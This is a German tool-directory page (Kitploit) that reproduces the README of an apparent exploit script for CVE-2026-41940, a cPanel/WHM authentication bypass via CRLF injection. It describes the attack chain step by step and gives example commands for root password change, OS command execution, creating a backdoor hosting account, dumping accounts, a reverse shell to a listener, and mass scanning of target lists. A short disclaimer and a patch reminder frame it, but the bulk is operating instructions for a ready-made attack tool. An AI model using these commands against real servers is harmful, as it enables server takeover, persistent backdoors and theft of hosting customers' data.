Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940 — cPanel/WHM Authentifizierungsumgehung (Zero-Day-Sicherheitslücke) | Kitploit
Tools/GitHubGitHub/christian93111/cve-2026-41940
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlAuthentifizierungLernen & BildungRed TeamingPayload-Entwicklung
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

cPanel/WHM Authentifizierungsumgehung (Zero-Day-Sicherheitslücke)

1024vor 3 MonatenNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-41940: cPanel/WHM Authentifizierungsumgehung (Einzel- & Mehrfachziele)

Haftungsausschluss: Dieses Dokument und das zugehörige Skript (exploit.py) dienen ausschließlich zu Bildungszwecken, Sicherheitsforschung und autorisierten Penetrationstests. Verwenden Sie diese Software nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.

Übersicht

exploit.py ist ein Skript, das eine Authentifizierungsumgehungsschwachstelle (CVE-2026-41940) in cPanel & WHM demonstriert. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, eine Root-Sitzung in den Daemon-Cache einzuschleusen, indem eine CRLF-Injection-Schwachstelle ausgenutzt wird, was letztendlich Root-Level-WHM-Zugriff ohne gültige Anmeldeinformationen gewährt.

Schwachstellenanalyse & Exploit-Ablauf

Der Exploit nutzt eine CRLF (Carriage Return Line Feed)-Injection-Schwachstelle im Basic-Authentifizierungsmechanismus in Kombination mit einem Sitzungsweitergabefehler aus. Das Skript automatisiert den Angriff in vier Schritten:

  1. Vorauthentifizierungs-Sitzungserstellung: Verbindet sich mit öffentlichen Login-Endpunkten (z. B. /login/ oder ), um eine grundlegende nicht authentifizierte Sitzungscookie () zu erhalten.
/cgi/login.cgi
whostmgrsession
  • CRLF-Injection: Sendet einen maßgeschneiderten Basic-Authentifizierungs-Header mit einem Base64-codierten Payload, der Root-Sitzungsfelder direkt in den cpsrvd-Sitzungs-Cache injiziert. Die Weiterleitungsantwort des Servers gibt das generierte Sicherheitstoken (cpsess) preis.
  • Sitzungsweitergabe: Das rohe Sitzungscookie wird an einen authentifizierten WHM-Endpunkt gesendet, wodurch do_token_denied ausgelöst wird, um die gefälschte Sitzung in den Daemon-Cache zu propagieren – wodurch sie zu einer gültigen authentifizierten Sitzung wird.
  • Überprüfung: Greift auf eingeschränkte WHM-API-Endpunkte (z. B. /json-api/version) mit der gefälschten Sitzung zu, um den Root-Level-Zugriff zu bestätigen.

  • Voraussetzungen

    • Python 3.x
    • requests-Bibliothek
    root@kitploit:~
    pip install requests
    

    Verwendung

    root@kitploit:~
    python exploit.py --target <URL> [options]
    python exploit.py --target-file <FILE> [options]
    

    Argumente

    Zielauswahl

    ArgumentBeschreibung
    --target URLEinzelne WHM-URL (z. B. https://target:2087)
    --target-file FILEDatei mit Zielen (eine ip:port pro Zeile) – aktiviert automatisch den Prüfmodus

    Netzwerk- & Kernoptionen

    ArgumentBeschreibung
    --threads NGleichzeitige Threads für den Mehrfachziel-Modus (Standard: 10)
    --hostname HOSTÜberschreibt den Host-Header – verwenden, wenn die automatische Erkennung fehlschlägt oder einen falschen Hostnamen liefert
    --timeout NTimeout pro Anfrage in Sekunden (Standard: 15)
    --retries NAnzahl der Wiederholungsversuche bei Netzwerkfehlern (Standard: 3)
    --cookie-name NAMEErzwingt einen bestimmten Sitzungscookie-Namen (wird bei Auslassung automatisch erkannt)
    --no-verifyÜberspringt die Überprüfung in Phase 4 und fährt trotzdem fort

    Ausnutzungsoptionen (nach Umgehung)

    ArgumentBeschreibung
    --checkNur-Prüfmodus – Schwachstelle überprüfen, ohne auszunutzen (wird automatisch mit --target-file gesetzt)
    --password PASSÄndert das Root-Passwort in PASS
    --api FUNCRuft eine bestimmte WHM JSON-API-Funktion auf
    --api-params K=V,...Kommagetrennte Parameter für --api
    --exec CMDFührt einen Betriebssystembefehl über WHM scripts/run_script aus (Fallback: rawexec)
    --sessionGeneriert eine Root-Ein-Klick-Login-URL – sofort öffnen, Token läuft schnell ab
    --shellStartet eine interaktive WHM-Shell (nur Einzelziel)
    --dumpGibt Serverinformationen aus: Version, Konten, DNS-Zonen, Berechtigungen
    --add-user USER PASS DOMAINErstellt ein neues cPanel-Hosting-Konto
    --revshell LHOST LPORTSendet eine Bash-Reverse-Shell an Ihren Listener

    Ausgabeoptionen

    ArgumentBeschreibung
    --output FILESpeichert Sitzungstoken und Details in einer JSON-Datei

    Beispiele

    root@kitploit:~
    # Überprüfen, ob das Ziel verwundbar ist
    python exploit.py --target https://target:2087 --check
    
    # Serverinformationen ausgeben (Version, Konten, Berechtigungen)
    python exploit.py --target https://target:2087 --dump
    
    # Ein-Klick-Root-Login-URL generieren (sofort im Browser einfügen)
    python exploit.py --target https://target:2087 --session
    
    # Einen Befehl ausführen
    python exploit.py --target https://target:2087 --exec "id"
    
    # In eine interaktive WHM-Shell wechseln
    python exploit.py --target https://target:2087 --shell
    
    # Root-Passwort ändern
    python exploit.py --target https://target:2087 --password 'NewP@ss!'
    
    # WHM-API direkt aufrufen
    python exploit.py --target https://target:2087 --api version
    python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1
    
    # Ein Hintertür-cPanel-Konto erstellen
    python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com
    
    # Reverse-Shell senden
    python exploit.py --target https://target:2087 --revshell YOUR_IP 4444
    
    # Hostnamen überschreiben (verwenden, wenn die automatische Erkennung fehlschlägt)
    python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check
    
    # Mehrere Ziele scannen (Nur-Prüfmodus)
    python exploit.py --target-file ips.txt
    python exploit.py --target-file ips.txt --threads 20
    
    # Sitzung in Datei speichern
    python exploit.py --target https://target:2087 --dump --output results.json
    

    Interaktive Shell-Befehle

    Bei Verwendung von --shell stehen folgende Befehle zur Verfügung:

    BefehlBeschreibung
    api <function> [k=v ...]Ruft eine WHM JSON-API-Funktion auf (z. B. api version)
    exec <command>Führt einen Betriebssystembefehl über WHM aus (z. B. exec id)
    passwd <newpass>Ändert das Root-Passwort
    dumpGibt Serverinformationen aus
    revshell <lhost> <lport>Sendet eine Reverse-Shell
    add <user> <pass> <domain>Erstellt ein cPanel-Konto
    save <path>Speichert die aktuelle Sitzung in einer Datei
    exit / quitBeendet die Shell

    Erinnerung

    Aktualisieren Sie sofort die neuesten cPanel/WHM-Sicherheitspatches.

    Tool herunterladen